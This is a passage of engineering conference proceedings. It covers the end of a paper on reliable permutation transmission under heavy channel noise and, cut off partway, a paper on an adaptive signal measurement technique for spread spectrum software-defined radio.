to different letters used by the source, that is, the received word represents a permutation of these letters, and this permutation is used by the source, the word is issued to the consumer. Otherwise, all word recognition operations are repeated, starting from step 2 in this list. 6. The number of the accumulated fragments can be sequentially increased up to a certain predetermined threshold lmax . If the word is not recognized on reaching the threshold, the reception procedure is terminated, and the signal “Channel failure” is outputted.
3 Experiments To test the efficiency of the developed method for reliable permutation transmission, a program model has been constructed. Figure 4 shows the operation algorithm of the model data receiver. To conform to Remark 3, in the model example word W is formed of N = 23 letters, which are non-zero circular shifts Lj , where 1 ≤ j ≤ 23, of permutations of length M = 8. Value L0 = (0,1,7,3,2,5,4,6) = (000,001,111,011,010,101,100,110). The communication channel in the model example is binary symmetrical. The bit errors are independent.
4 Results Figure 5 shows the graphs reflecting experimentally determined (in 1,000 trials) dependencies of relative frequencies of a word and a letter being received correctly on a fixed number of accumulated fragments l for the bit error probability p0 = 0.4.
188
E. Faure et al.
Fig. 4. Data receiver algorithm
Fig. 5. Relative frequencies of a word and a letter being received correctly, depending on a fixed number of accumulated fragments
A Method for Reliable Permutation Transmission
189
In addition, in Fig. 5, the markers indicate the corresponding graphs of theoretical dependencies PL_true and PW _true on l in accordance with Eqs. (2) and (3). The theoretical and experimental dependences in Fig. 5 are consistent according to the Pearson criterion with achieved significance levels (p-values [28]) close to unity. This correspondence between the theoretical and experimental dependences is also observed for other p0 values. All of the above proves that the constructed data transmission model is correct. Figure 6 shows the experimentally determined relative frequency of a word being received correctly, depending on the number of accumulated fragments l, for the bit error probability p0 = 0.495. In addition, Fig. 6 shows the estimation PW _true_final (l) of the probability of a word being received correctly calculated according to Eq. (13), for p0 = 0.495.
Fig. 6. Relative frequency of a word being received correctly, depending on the number of accumulated fragments
An analysis of the results shown in Fig. 6 confirms the validity of estimate (13). Note, however, that this estimate is rather rough. Remark 8. Cases when a word would be received incorrectly did not occur in 10,000 trials during the experimental study of the developed method for p0 ≤ 0.495. Figure 7 identifies the experimentally determined probabilistic indicators of a word being received correctly with the bit error probability p0 ≤ 0.495. The following section will discuss the situation when the bit error probability exceeds p0 = 0.495, while the data transmission system is designed for p0 ≤ 0.495 and generates a communication channel failure signal when it is impossible to receive the transmitted word for the maximum accumulation factor lmax . In the model example being considered here, lmax is calculated to provide PW _true ≥ 0.999 at p0 = 0.495. The dependences in Fig. 8 define the experimentally determined probabilistic indicators of a word being received correctly at the bit error probability p0 ≥ 0.495.
190
E. Faure et al.
Fig. 7. Relative frequency of a word being received correctly, depending on the number of accumulated fragments, for p0 ≤ 0.495: (a) p0 ≤ 0.4; (b) p0 ≥ 0.43
Figure 8 indicates that when the bit error probability exceeds the limit value (for the considered model example p0 = 0.495), the requirements conditioning the probability of the word being received correctly are not fulfilled. For example, the relative frequency of a word being received correctly with an accumulation factor lmax equals to 0.9966 for p0 = 0.496 and is 0.5454 for p0 = 0.497. For p0 = 0.498, cases when the transmitted words are received correctly have not been observed in 10,000 trials during the experimental study. Note also that cases when a word is received incorrectly have not occurred in 10,000 trials for p0 = 0.496, p0 = 0.497, and p0 = 0.498.
A Method for Reliable Permutation Transmission
191
Fig. 8. Relative frequency of a word being received correctly, depending on the number of accumulated fragments, for p0 ≥ 0.495
Figure 9 shows the average number of accumulated fragments required to receive a word correctly, as a bit error rate function.
Fig. 9. Average number of accumulated fragments required to receive a word correctly, depending on bit error rate
The graph in Fig. 9 indicates the exponential nature of the increase observed in the average number of accumulated fragments.
192
E. Faure et al.
5 Discussion The efficiency of the developed method for reliable permutation transmission has been confirmed by the model example demonstrating method implementation for M = 8, n = 24, N = 23, PW _true_final ≥ 0.999 with the maximum allowable bit error probability p0 = 0.495, lmax = 36, 413. However, when designing the communication system, other values may be set for the length of the transmitted permutation N , as well as the minimum probability of its correct reception PW _true . In this case, permutation π of length M , where log2 M ·M ≥ N , may be selected as the base permutation to form N letters. Then permutation π must satisfy the requirements set in Definition 1. The probability PW _true will determine the limiting value of the accumulation factor lmax based on Eq. (3). Since PL_true < 1, Eq. (3) implies that PW _true increases with decreasing N . Therefore, the requirements that ensure the set probability of permutation PW _true to be received correctly are achievable for any M : log2 M · M ≥ N . Selecting optimal values for {N , M } to achieve the necessary probabilistic indicators of the data transmission system is beyond the scope of this study, but may become of interest for further research. In addition, the developed method for reliable permutation transmission is similar to the principles for constructing a noise-like signal (when using direct sequence spread spectrum, DSSS) in terms of representing each letter of a word by a certain bit sequence. Here, we compare the probabilistic characteristics for these two methods. For the model example of this study, each word W is a permutation of length N = 23 and is encoded by a sequence consisting of 23·24 = 552 bits. At the same time, to ensure PW _true_final ≥ 0.999 PW _false_final ≤ 3.6 · 10−4 at p0 = 0.495, an accumulation factor lmax is required. Such an accumulation factor requires a transfer of 552 · 36, 413 = 20,099,976 bits. For traditional DSSS system, each permutation bit is transmitted through the channel as a sequence consisting of B chips. Let the permutation W symbols be encoded by a fixed-length binary code. Then the codeword length for each permutation symbol for N = 23 is equal to log2 23 = 5 bits; the permutation length is equal to 115 bits. To ensure the same channel rate for DSSS, each permutation W bit is represented by = 174,782 chips. B = 20,099,976 115 Having discussed the above, we will now move on to determine bit error probability of the DSSS method with given parameters. Suppose that two-position phase shift keying is used during transmission. The bit error rate of BPSK under additive white Gaussian noise can be calculated as:
2Eb , (18) p0 = Q N0
A Method for Reliable Permutation Transmission
where Q(x) =
√1 2π
∞ x
193
1 2
e− 2 t dt is the complementary Gaussian error function; Eb is
energy per bit; 21 N0 is noise power spectral density. When using DSSS, the bit error rate 2BEb in word W is equal to p0 (W ) = Q N0 . −3 according to b With bit error rate p0 = 0.495, we can find 2E N0 = 12.53 · 10 2BEb Eq. (18). Then p0 (W ) = Q = 80.34 · 10−9 . N0 The word W will be received correctly if and only if all of its bits are received correctly. The probability of such event is PW _true_DSSS = (1 − p0 (W ))115 = 1−9·10−6 . Note that this probability exceeds the requirement PW _true_final ≥ 0.999, for which the value lmax has been defined. However, estimation PW _true_final can be considered as rather rough. The minimum value l from the curve of the relative frequency of the word being received correctly experimentally constructed in Fig. 6, at which this relative frequency reaches the value 1 − 9 · 10−6 , is equal to l = 29, 123. With such an accumulation factor, the relative frequency of correct word recognition reaches value 1 − 4.6 · 10−14 . Accumulation factor lmax requires transmitting 552 · 29, 123 = 16,075,896 bits. Then, to ensure the same channel transmission rate, the number of chips per bitfor DSSS system is equal to B = 1.39 · 10−6 ,
20,099,976 115
= 139,791. In this case, p0 (W ) = Q
2BEb N0
=
and PW _true_DSSS = (1 − p0 (W )) = 0.9998. The results indicate a higher probability of a word being received correctly ensured by the developed method as compared to the DSSS method in case of the model example considered here. At the same time, further research is required to compare the indicators offered by the above methods and to form definitive conclusions. 115
6 Conclusions The present study develops a method for reliable permutation transmission that can be used in communication systems with non-separable factorial coding, in particular, to implement a three-pass cryptographic protocol based on permutations. The proposed method uses circular shifts of the carrier permutation to represent each character (letter) in the transmitted permutation (word). The carrier permutation is a permutation that has the maximum value of the minimum Hamming distance from its binary representation to all its circular shifts. The receiver implements the majority and correlation processing of the fragments received from the communication channel. The fragment length is equal to the letter length. This processing makes it possible to realize a reliable transmission of a word under the influence of high-intensity channel noise. An algorithm that applies the proposed method has been developed and implemented. A simulation software model of the data transmission system has been constructed. An analysis of the model’s performance confirms that the above theoretical evaluations are veracious. In addition, a comparative analysis of the experimentally obtained probability to receive an error-free permutation for the developed method and the corresponding probability for the DSSS method at equal transmission rate and bit error rate in the communication channel p0 = 0.495 confirms the effectiveness of the developed method.
194
E. Faure et al.
Acknowledgements. This research was funded from the Ministry of Education and Science of Ukraine under grant 0120U102607.
References 1. Avizienis, A., Laprie, J.-C., Randell, B.: Fundamental Concepts of Dependability. University of Newcastle upon Tyne, Newcastle upon Tyne, Department of Computing Science (2001) 2. Pfleeger, C.P., Pfleeger, S.L., Margulies, J.: Security in Computing. Prentice Hall, Upper Saddle River (2015) 3. Bishop, M., Sullivan, E., Ruppel, M.: Computer Security: Art and Science. Addison-Wesley, Boston (2019) 4. Yin, L., Fang, B., Guo, Y., Sun, Z., Tian, Z.: Hierarchically defining Internet of Things security: From CIA to CACA. Int. J. Distrib. Sens. Netw. 16, 155014771989937 (2020). https://doi. org/10.1177/1550147719899374 5. Al-Azzeh, J.S., Ayyoub, B., Faure, E., Shvydkyi, V., Kharin, O., Lavdanskyi, A.: Telecommunication Systems with Multiple Access Based on Data Factorial Coding. Int. J. Commun. Antenna Propag. 10, 102–113 (2020). https://doi.org/10.15866/irecap.v10i2.17216 6. Bana, A.-S., Trillingsgaard, K.F., Popovski, P., de Carvalho, E.: Short Packet structure for ultra-reliable machine-type communication: tradeoff between detection and decoding. In: 2018 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), pp. 6608–6612. IEEE, Calgary, AB (2018). https://doi.org/10.1109/ICASSP.2018.8461650 7. Feng, C., Wang, H.: Secure Short-Packet Communications at the Physical Layer for 5G and Beyond (2021). https://doi.org/10.48550/ARXIV.2107.05966 8. Feng, C., Wang, H.-M., Poor, H.V.: Reliable and secure short-packet communications. IEEE Trans. Wirel. Commun. 21, 1913–1926 (2022). https://doi.org/10.1109/TWC.2021.3108042 9. Faure, E.V.: Factorial coding with data recovery. Visnyk Cherkaskogo Derzhavnogo Tehnol. Univ. 2, 33–39 (2016) 10. Faure, E.V.: Factorial coding with error correction. Radio Electron. Comput. Sci. Control. 3, 130–138 (2017). https://doi.org/10.15588/1607-3274-2017-3-15 11. Faure, E., Shcherba, A., Stupka, B.: Permutation-based frame synchronisation method for short packet communication systems. In: 2021 11th IEEE International Conference on Intelligent Data Acquisition and Advanced Computing Systems: Technology and Applications (IDAACS), pp. 1073–1077. IEEE, Cracow, Poland (2021). https://doi.org/10.1109/IDAACS 53288.2021.9660996 12. Al-Azzeh, J., Faure, E., Shcherba, A., Stupka, B.: Permutation-based frame synchronization method for data transmission systems with short packets. Egypt. Inform. J. (2022). https:// doi.org/10.1016/j.eij.2022.05.005 13. Lee, B., Park, S., Love, D.J., Ji, H., Shim, B.: Packet structure and receiver design for low latency wireless communications with ultra-short packets. IEEE Trans. Commun. 66, 796–807 (2018). https://doi.org/10.1109/TCOMM.2017.2755012 14. Lee, H., Ko, Y.-C.: Physical layer enhancements for ultra-reliable low-latency communications in 5G new Radio systems. IEEE Commun. Stand. Mag. 5, 112–122 (2021). https://doi. org/10.1109/MCOMSTD.0001.2100002 15. Park, J., et al.: Extreme ultra-reliable and low-latency communication. Nat. Electron. 5, 133– 141 (2022). https://doi.org/10.1038/s41928-022-00728-8 16. Li, Y., Huynh, D.V., Do-Duy, T., Garcia-Palacios, E., Duong, T.Q.: Unmanned aerial vehicleaided edge networks with ultra-reliable low-latency communications: a digital twin approach. IET Signal Process. 1−12 (2022). https://doi.org/10.1049/sil2.12128
A Method for Reliable Permutation Transmission
195
17. Traßl, A., et al.: Outage prediction for ultra-reliable low-latency communications in fast fading channels. EURASIP J. Wirel. Commun. Netw. 2021(1), 1–25 (2021). https://doi.org/10.1186/ s13638-021-01964-w 18. Wang, K., Pan, C., Ren, H., Xu, W., Zhang, L., Nallanathan, A.: Packet error probability and effective throughput for ultra-reliable and low-latency UAV communications. IEEE Trans. Commun. 69, 73–84 (2021). https://doi.org/10.1109/TCOMM.2020.3025578 19. Schneier, B.: Applied Cryptography: Protocols, Algorithms, and Source Code in C. Wiley, New York (1996) 20. Nguyen, D.M., Kim, S.: A quantum three pass protocol with phase estimation for many bits transfer. In: 2019 International Conference on Advanced Technologies for Communications (ATC). pp. 129–132. IEEE, Hanoi, Vietnam (2019). https://doi.org/10.1109/ATC.2019.892 4514 21. Badawi, A., Zarlis, M., Suherman, S.: Impact three pass protocol modifications to key transmission performance. J. Phys. Conf. Ser. 1235, 012050 (2019). https://doi.org/10.1088/17426596/1235/1/012050 22. Moldovyan, A., Moldovyan, D., Moldovyan, N.: Post-quantum commutative encryption algorithm. Comput. Sci. J. Mold. 81, 299–317 (2019) 23. Shcherba, A., Faure, E., Lavdanska, O.: Three-pass cryptographic protocol based on permutations. In: 2020 IEEE 2nd International Conference on Advanced Trends in Information Theory (ATIT), pp. 281–284. IEEE, Kyiv, Ukraine (2020). https://doi.org/10.1109/ATIT50 783.2020.9349343 24. Peterson, W.W., Weldon, E.J.: Error-Correcting Codes. MIT Press, Cambridge (1972) 25. MacWilliams, F.J., Sloane, N.J.A.: The Theory of Error Correcting Codes. North Holland Publishing Co. (1977) 26. Morelos-Zaragoza, R.H.: The Art of Error Correcting Coding. John Wiley, Chichester (2006) 27. Huffman, W.C., Pless, V.: Fundamentals of Error-Correcting Codes. Cambridge University Press, Cambridge (2010) 28. Bassham III, L.E., et al.: Special Publication (NIST SP) - 800–22 Rev 1a. A Statistical Test Suite for Random and Pseudorandom Number Generators for Cryptographic Applications. National Institute of Standards & Technology, Gaithersburg, MD, USA (2010)
Intelligent Signal Measurement Technique for Spread Spectrum Software Defined Cognitive Radio Systems Oleksii Holubnychyi(B) , Maksym Zaliskyi, Anatolii Taranenko, Yevhen Gabrousenko, and Olga Shcherbyna National Aviation University, Kyiv, Ukraine [email protected]
Abstract. The paper proposes an intelligent signal measurement technique for spread spectrum software defined cognitive radio systems. The main feature of the technique is that it works at the physical layer of wideband radio systems, which use orthogonal components (e.g., Walsh codes), and multi-position signals (e.g., QAM). The level of multiplicative noise (slow fading) and the variance of additive noise are subject to evaluation in the proposed measurement technique. The technique is based on the indirect measurement approach and the correlation method, and also uses a signal processing system with a set of mutually non-correlated measurement signals and interior parameters that are additionally formed and used in the technique. These parameters influence the accuracy of measurement, which is the criterion for an unsupervised adaptive tuning in the proposed technique. The adaptive tuning defines an intelligent component of the proposed technique. A detailed analysis of accuracy of measurement for the proposed technique is also presented in the paper. Keywords: Spread spectrum communications · Software defined radio · Cognitive radio · Signal measurement · Intelligent system
1 Introduction Intelligent systems and techniques, which deal with signal processing and, in particular, signal measurement, in general, are known in the field of information and communications technology, e.g., measurements and statistical analyses of electromagnetic noise for industrial wireless communications [1], fuzzy decision trees embedded with evolutionary fuzzy clustering for locating users using wireless signal strength in an indoor environment [2], intelligent signal processing in an automated measurement data analysis system [3] and others. Signal measurement techniques are enough demand for wideband low power communications, which are characterized by relatively low values of signal to noise ratio, such as spread spectrum communications [4], wireless long distance and low power networks (LPWAN), and the LoRa (Long Range) protocol [5], some cognitive radio and modern intelligent radio concepts [6]. The problem of signal and noise level © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 196–207, 2023. https://doi.org/10.1007/978-3-031-35467-0_13
Intelligent Signal Measurement Technique for Spread Spectrum Software
197
estimation in a receiver when complex signal and code structures, e.g., complementary sequences [7–9] are used, takes place for these kinds of wireless communications. Optimal values of thresholds during signal processing depend on prior data on signal and noise level, and they influence the efficiency of data transfer and processing in general. A kind of intelligent signal measurement techniques, dealt with by the paper, is an unsupervised signal measurement that can be tuned automatically using the criterion of minimum symbol error rate (and, as a consequence, bit error rate) during processing of spread spectrum signals with a multi-level modulation (e.g., QAM) [10] and variable parameters (one of the features of cognitive radio systems) in software defined radio (SDR) receiving equipment [11–13]. These peculiarities of signal measurement define the relevance of a signal processing technique, which is being proposed in the paper, for modern SDR applications, when measurements are carried out directly at the physical layer of radio systems. Intelligent signal measurement techniques in the field of information and communications technology, which are the most promising, in particular, for electromagnetic compatibility purposes, take into account indirect measurement approaches (e.g., [14]). In this case, the accuracy of measurement is a subject of detailed analysis, taking into account a mathematical model of signal and code structures in a spread spectrum cognitive radio system. Moreover, parameters, which characterize this accuracy, can be used in an intelligent signal measurement technique for the criterion of its unsupervised adaptive tuning, depending on input signal and noise parameters. In this regard, the aim of the paper is to propose an intelligent signal measurement technique for spread spectrum SDR cognitive radio systems, which takes into account a mathematical description of spread spectrum signals with multi-level modulation, a possible variability of their parameters, and also uses the accuracy of measurement for unsupervised adaptive tuning. The rest of the paper is organized as follows: Sect. 2 presents materials and methods, including a description of the mathematical model of signals to be measured, the developing an intelligent signal measurement technique for spread SDR cognitive radio systems, and an analysis of features and peculiarities of this technique, Sect. 3 describes experiments consisting of two examples, the results are shown in Sect. 4, Sect. 5 contains a discussion, including a detailed analysis of the accuracy of measurement for the proposed technique, and, finally, Sect. 6 describes conclusions.
2 Materials and Methods 2.1 Mathematical Model of Signals to be Measured Let the spread spectrum signal with the processing gain G (the ratio between the transmission bandwidth and data bandwidth) be the sum of N orthogonal components: S(t) =
N n=1
Sn (t),
(1)
where each orthogonal component can be expressed as Sn (t) = an (t)xn (t), n = 1, N .
(2)
198
O. Holubnychyi et al.
In the expression (2) an (t) denotes bipolar discrete values (symbols), which are transferred using reference signals xn (t). The system of signals xn (t), n = 1, N , is orthogonal, i.e. xi (t)xj (t)dt = 0, i = j, i = 1, N , j = 1, N , where τ is a duration of t∈τ
one transferred symbol. The structure of signal, which is presented by expressions (1) and (2), also matches the physical layer of different wideband radio systems that use orthogonal components, e.g., Walsh or Gold codes, sinusoidal and cosine components of QAM modulation, orthogonal components of OFDM, etc. In doing so, for binary communication systems an (t) = ±1, and an (t) for communication systems with multi-position signals can take a number of discrete values, e.g., an (t) = {±1; ±3; ±5; ±7} for QAM-64. A signal at the input of spread spectrum SDR receiving equipment can be expressed as Z(t) = μS(t) + η(t),
(3)
where μ is the component of multiplicative noise, a level of which is constant in comparison with τ (slow fading), i.e. μ(t|t ∈ τ) = μ; η(t) is an additive noise. The value of μ and the variance of additive noise ση2 are subject to evaluation in the technique, which is being developed in the paper. 2.2 Developing the Technique Let us analyze the result of correlation method based signal processing of input signal Z(t) in a signal processing system for n-th orthogonal component, which can be represented by expression ∼ ∼ Km Z(t) + ηm (t) Lm xn (t) + ξ m (t) dt, Em =
(4)
t∈τ
where Km and Lm are coefficients of amplification (attenuation) of Z(t) and xn (t), respec∼
∼
tively; ηm (t), ξ m (t) are mutually non-correlated signals at the time interval t ∈ τ, which are formed additionally in the signal processing system; the properties of these signals are also close to the white noise; m = 1, 2 (i.e. the considered signal processing system consists of two processing units). Transforming the expression (4), we obtain Em = μK m Lm
xn (t)S(t)dt+ t∈τ
μK m
∼ S(t) ξ m (t)dt
t∈τ
Km t∈τ
∼ η(t) ξ m (t)dt
+ Km Lm
xn (t)η(t)dt+ t∈τ
+ Lm t∈τ
∼ xn (t)ηm (t)dt
+ t∈τ
∼
∼
ηm (t) ξ m (t)dt.
(5)
Intelligent Signal Measurement Technique for Spread Spectrum Software
199
In the technology of SDR signal processing the expression (5) will be implemented through the corresponding signal samples. In this case, each signal-code construction can be represented at the time interval t ∈ τ by means of G samples: E˜ m = μK m Lm Km
G k=1
G
xn,k Sk + μK m ∼
k=1
ηk ξ m,k + Lm
G
∼
k=1
G
Sk ξ m,k + Km Lm ∼
k=1
xn,k ηm,k +
G k=1
G k=1
xn,k ηk +
(6)
∼ ∼ ηm,k ξ m,k .
Consider the first term in the expression (6), provided that signals xn (t), n = 1, N , form an orthogonal basis: μK m Lm
G k=1
xn,k Sk = μK m Lm
G k=1
2 an xn,k = μK m Lm an Gσx2n ,
(7)
where an are bipolar discrete values (symbols), which are transferred using the reference signals xn (t) at the current time interval t ∈ τ; σx2n is the variance of reference signals xn (t). Taking into account (7), the expression (6) can be written in the form E˜ m = μK m Lm an Gσx2n + μK m Km
G
∼
k=1
ηk ξ m,k + Lm
G
∼
k=1
G
Sk ξ m,k + Km Lm ∼
k=1
xn,k ηm,k +
G k=1
G k=1
xn,k ηk +
(8)
∼ ∼ ηm,k ξ m,k .
σ2˜ Em
Let us estimate the variance of response of the signal processing system (4) for the case when M symmetric amplitude levels can be realized equiprobably in each n-th component Sn (t) = an (t)xn (t), n = 1, N , i.e.
an = an,l = ±an,1 ; ±an,2 ; . . . ; ±an,M /2−1 ; ±an,M /2 , l = 1, M . The variance of response of the signal processing system (4), which have a form (8), taking into account theorems on numerical characteristics of functions of random variables, in particular, the theorem on the shift of a non-random variable, the theorem on the variance of the linear function, the theorem on the variance of the product of independent random variables [15, 16], can be expressed as σE2˜ m
=
μ2 Km2 L2m G 2 σx4n M M
a2 l=1 n,l
+
μ2 Km2 GN σx2n σ∼2 M ξ
a2 + l=1 n,l
m
M
Km2 L2m Gσx2n ση2 + Km2 Gση2 σ∼2 + L2m Gσx2n σ∼2 + Gσ∼2 σ∼2 = Km2 Gσx2n M
ηm
ξm
2 an,l
ηm ξ m
L2m Gσx2n + N σ∼2 μ2 +
l=1 M ξm Km2 G L2m σx2n + σ∼2 ση2 + Gσ∼2 L2m σx2n + σ∼2 . ξm
ηm
ξm
(9)
200
O. Holubnychyi et al.
Let us introduce the following notation system: Km2 Gσx2n M 2 Am = an,l L2m Gσx2n + N σ∼2 ; l=1 M ξm Bm = Km2 G L2m σx2n + σ∼2 ; ξm
Cm = Gσ∼2
ηm
(10)
L2m σx2n + σ∼2 ; ξm
Dm = σE2˜ . m
Using the notation system (10) for the expression (9) and taking into account that the considered signal processing system consists of two processing units (m = 1, 2), the system of equations is obtained:
D1 = A1 μ2 + B1 ση2 + C1 , (11) D2 = A2 μ2 + B2 ση2 + C2 . The unknown variables in the system (11) are μ and ση2 , i.e. the values that are subject to evaluation in the proposed technique. A solution for the system (11) in general case can be written in the form: √ ± (A1 B2 − B1 A2 )(B1 C2 − B1 D2 − C1 B2 + D1 B2 ) μ1,2 = ; (12) A1 B2 − B1 A2 ση2 =
A2 C1 − A2 D1 − C2 A1 + D2 A1 . A1 B2 − B1 A2
The sign “±” for μ in the expression (12) may also have a simple physical meaning: if the signal passes through the communication channel without inversion, then μ > 0, and if with inversion, then μ < 0. The power of useful signal, which is part of the power of useful signal with additive noise at the input of spread spectrum SDR receiving equipment (3) is proportional to μ2 and does not depend on the sign of μ. In Fig. 1. The signal processing scheme, which implements the proposed signal measurement technique for spread spectrum SDR cognitive radio systems, is shown. Note that an intelligent component of the technique depends on the accuracy of measurement (i.e., the accuracy of estimation of μ and ση2 ) and it is analyzed below in the paper. 2.3 Features and Peculiarities of the Technique As can be seen from the system (12), the expressions for μ and ση2 have the same denominators. With this in mind, the proposed technique is able to work when the condition (13) is met. A1 B2 − B1 A2 = 0.
(13)
Intelligent Signal Measurement Technique for Spread Spectrum Software
201
Fig. 1. Signal processing scheme which implements the proposed signal measurement technique
Consequently, a set of parameters when the technique does not work is defined by the condition: A1 B2 − B1 A2 = 0.
(14)
To do this, let us solve the parametric Eq. (14), taking into account the previously introduced notation system (10) for the coefficients A1 , B1 , A2 , B2 : K12 K22 G 2 σx2n M 2 2 2 2 2 2 2 L1 Gσxn + N σ∼ L2 σxn + σ∼ (15) a l=1 n,l M ξ1 ξ2 K 2 K 2 G 2 σx2n M 2 − 1 2 L21 σx2n + σ∼2 = 0. an,l L22 Gσx2n + N σ∼2 l=1 M ξ2 ξ1 Simplifying (15), we obtain K12 K22 G 2 σx2n M M
a2 l=1 n,l
L21 Gσx2n
+ N σ∼ 2
ξ1
L22 σx2n
2 2 2 2 2 2 − L2 Gσxn + N σ∼ L1 σxn + σ∼ = 0. ξ2
+ σ∼ 2
ξ2
(16)
ξ1
Since the coefficients K1 = 0, K2 = 0, the processing gain G = 0, the power of each reference signal σx2n = 0, and the variance of symmetric amplitude levels
202
O. Holubnychyi et al.
(1/M )
M
2 l=1 an,l
= 0, the expression (16) can be reduced to
L21 Gσx2n
+ N σ∼ 2
ξ1
L22 σx2n
+ σ∼ 2
(17)
ξ2
2 2 2 2 2 2 − L2 Gσxn + N σ∼ L1 σxn + σ∼ = 0. ξ2
ξ1
The expression (17) can be written in the following form: σx2n (G − N ) L21 σ∼2 − L22 σ∼2 = 0. ξ2
(18)
ξ1
Taking into account that σx2n = 0, a solution of the parametric Eq. (14) is: 2 2 2 2 (G = N ) ∨ L1 σ∼ = L2 σ∼ . ξ2
(19)
ξ1
Consequently, the proposed signal measurement technique is able to work when the condition (20) is met: 2 2 2 2 (20) (G = N ) ∧ L1 σ∼ = L2 σ∼ . ξ2
ξ1
3 Experiments Pilot testing of the proposed technique is implemented using a simulation. It is the most relevant way of experimental verification due to the fact that the proposed technique is focused on a software implementation in different spread spectrum SDR radio systems. There are two following examples of simulation. Example 1. The parameters of the physical layer in a wideband radio system are: G = 24, N = 3, an = ±1, n = 1, N , M = 2. These parameters correspond to the physical layer of wideband radio system, which uses 3 multiplicative complementary binary signal-code constructions [7]. Let the signal-code constructions be transferred using orthogonal components at σx2n = 1, n = 1, N . 1. The parameters of a channel model are μ = 0.15 and ση2 = 5. 2. The parameters of the signal processing scheme, which is based on the proposed signal measurement technique, are: K1 = K2 = 1, L1 = 1, L2 = 2, and σ∼2 = σ∼2 = 1 ξ
η
for two processing units (m = 1, 2). Note that the values of parameters K1 , K2 , L1 , and L2 , which equal to 1, in fact, will remove the relevant multipliers in the signal processing scheme in Fig. 1 and, as a consequence, simplify it. However, this set of parameters does not match the condition (20), so L1 = L2 needs at least to be respected.
Intelligent Signal Measurement Technique for Spread Spectrum Software
203
3. The obtained intermediate measurement results in the signal processing scheme are σ2˜ = 303 and σ2˜ = 773. E1
E2
Example 2. 1. The parameters of the physical layer in wideband radio system and the parameters of a channel model are the same as for the example 1. 2. The parameters of the signal processing scheme, which is based on the proposed signal measurement technique, are: K1 = K2 = 1, L1 = 1, L2 = 3, and σ∼2 = σ∼2 = 1 ξ
η
for two processing units (m = 1, 2). Thus, it can be seen that the example 2 makes it possible to study a sensitivity to changes of the parameters L1 and L2 . 3. The obtained intermediate measurement results in the signal processing scheme are σ2˜ = 303 and σ2˜ = 1, 558. In this case, only the value of σ2˜ is changed, which E1 E2 E2 is explained by the fact that the modifiable parameter L2 corresponds to the second processing unit of the signal processing scheme.
4 Results The following results are obtained in the considered examples of simulation. In the example 1: 1. The values of parameters in the notation system (10) and in the signal processing scheme are: A1 = 648, A2 = 2, 376, B1 = 48, B2 = 120, C1 = 48, C2 = 120, D1 = 303, and D2 = 773. 2. The values of estimated parameters μ and ση2 are: μ = 0.143 and σ2η = 5.036. Note that for the considered example A1 B2 − B1 A2 < 0 in the expression (12). Because of that, the sign “−” must be used during a calculation of the parameter μ by means of the expression (12). The parameters B1 = C1 and B2 = C2 , which depends on the condition Km2 = σ∼2 for two processing units (m = 1, 2). This fact simplifies
η
calculating the parameters μ and ση2 . In the example 2: 1. The values of parameters in the notation system (10) and in the signal processing scheme are: A1 = 648, A2 = 5, 256, B1 = 48, B2 = 240, C1 = 48, C2 = 240, D1 = 303, and D2 = 1, 558. 2. The values of estimated parameters μ and ση2 are: μ = 0.146 and σ2η = 5.025.
5 Discussion The accuracy of measurement of parameters μ and ση2 can be characterized by absolute and relative errors of measurement. For the considered examples the relative errors of measurement are: 1. In the example 1: 4.5% and 0.7% for the parameters μ and ση2 , respectively.
204
O. Holubnychyi et al.
2. In the example 2: 2.6% and 0.5% for the parameters μ and ση2 , respectively. Experiments have shown that, in general, the accuracy of measurement of the parameter ση2 is better than one for the parameter μ. Moreover, a sensitivity to changes of the parameters A1 , A2 , B1 , B2 , C1 , C2 , D1 , and D2 is higher for estimating the parameter μ. A detailed analysis of the accuracy of measurement for the proposed technique is based on the analysis of accuracy of indirect measurement [17, 18], which may be characterized by the effects that depend on parameters [19]. Absolute errors of measurement of values of μ and ση2 (let us denote ση2 = Vη for convenience of expressions with derivatives) in the case of indirect measurement are: 2 2 ∂μ(ω) ∂Vη (ω) ωq ; Vη = ωq , (21) μ = q q ∂ωq ∂ωq where ω is the vector of parameters, which determine μ and ση2 using the expression (12) and taking into account the notation system (10). In general case, if we assume that all parameters can be characterized by uncertainty or some errors in their values: ω = (A1 , A2 , B1 , B2 , C1 , C2 , D1 , D2 ) =
(22)
2 2 2 2 2 2 2 = K1 , K2 , L1 , L2 , G, N , M , an , σxn , σ∼ , σ∼ , σ∼ , σ∼ , σE˜ , σE˜ . η1
η2
ξ1
ξ2
1
2
However, the values of G, N , M , and an are the parameters of physical layer of communication system and they are known a priori. The values of K1 , K2 , L1 , and L2 are the interior parameters of the signal processing system (coefficients of amplification or attenuation), which implements the proposed signal measurement technique. These parameters are set in the signal processing system and also known. The values of power of orthogonal reference signals xn (t), n = 1, N , estimated by σx2n , are typically normalized ∼
∼
∼
∼
in a communication system and known a priori. The signals η1 (t), η2 (t), ξ 1 (t), and ξ 2 (t) are generated in the signal processing system, that’s why the values of their power σ∼2 , η1
σ∼2 , σ∼2 , and σ∼2 are known or can be estimated very precisely (depending on algorithm η2
ξ1
ξ2
of their generation). That way, the a priori unknown parameters being initially estimated in the proposed technique are variances σ2˜ of signal processing response in the signal E processing system, i.e. the parameters D1 and D2 . Absolute errors of measurement of values μ and ση2 = Vη in the case of the proposed technique, taking into account in the expression (21) only an uncertainty concerning ω = (D1 , D2 ), are: 2 2 ∂μ(ω) ∂μ(ω) D1 + D2 ; (23) μ = ∂D1 ∂D2 2 2 ∂Vη (ω) ∂Vη (ω) Vη = D1 + D2 , ∂D1 ∂D2
Intelligent Signal Measurement Technique for Spread Spectrum Software
205
where D1 and D2 are absolute errors of measurement of variances σ2˜ in the signal E processing system, i.e. absolute errors of estimation of parameters D1 and D2 . Let us find the dependences for μ and Vη using for a compact form the notations from the expression (12). B22 D21 + B12 D22 1 ; (24) μ = 2 (A1 B2 − B1 A2 )(B1 C2 − B1 D2 − C1 B2 + D1 B2 ) A22 D21 + A21 D22 Vη = . (A1 B2 − B1 A2 )2 The intelligent component of the proposed technique boils down to an unsupervised adaptive tuning of the signal processing system by setting the optimal values of K1 , K2 , L1 , L2 , σ∼2 , σ∼2 , σ∼2 , and σ∼2 , which minimize μ and (or) Vη . It also takes into η1
η2
ξ1
ξ2
